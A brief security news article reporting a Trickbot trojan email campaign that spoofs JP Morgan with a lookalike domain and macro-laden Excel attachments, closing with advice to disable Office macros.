Go to listing page

Trickbot trojan campaign wears JP Morgan tag to fool victims

Trickbot trojan campaign wears JP Morgan tag to fool victims
  • This new campaign of Trickbot imitates JP Morgan’s official email addresses to lure users into downloading the trojan from the emails.
  • Attackers have used a domain registered through GoDaddy that is similar to JP Morgan.

The shapeshifting Trickbot is back in a new form. This time, it dons the hat of JP Morgan & Chase to perpetuate its malicious campaign to infect systems.

What’s more, it comes with a set of variations in this version. Spam emails related to this trojan now contain Excel spreadsheets instead of the regular Word doc attachment witnessed in earlier versions.

According to myonlinesecurity.co.uk which reported this development, the email addresses have striking resemblances to JP Morgan.

“The email with the subject of “FW: Incoming Confirmation” pretends to come from Jane McMillan Tax Senior at JPMorgan but actually comes from “Jane.McMillan@chase-sdx.com” which is a look-a-like, typo-squatted or other domain that can easily be misidentified, mistaken or confused with the genuine site,” the article stated.

Encrypted Powershell script

When the trojan was analyzed, its macro was found to contain a different Powershell script. It is a Base64 encoded version which makes it little more difficult for a security expert to pinpoint the download URLs whereas online sandboxes can easily read through the obfuscated script.

Therefore, users are advised to disable macros in Microsoft Office or similar document software. The latest versions offer “protected view” which stops any embedded malware, macros and DDE “exploit /Feature” from running.

Cyware Publisher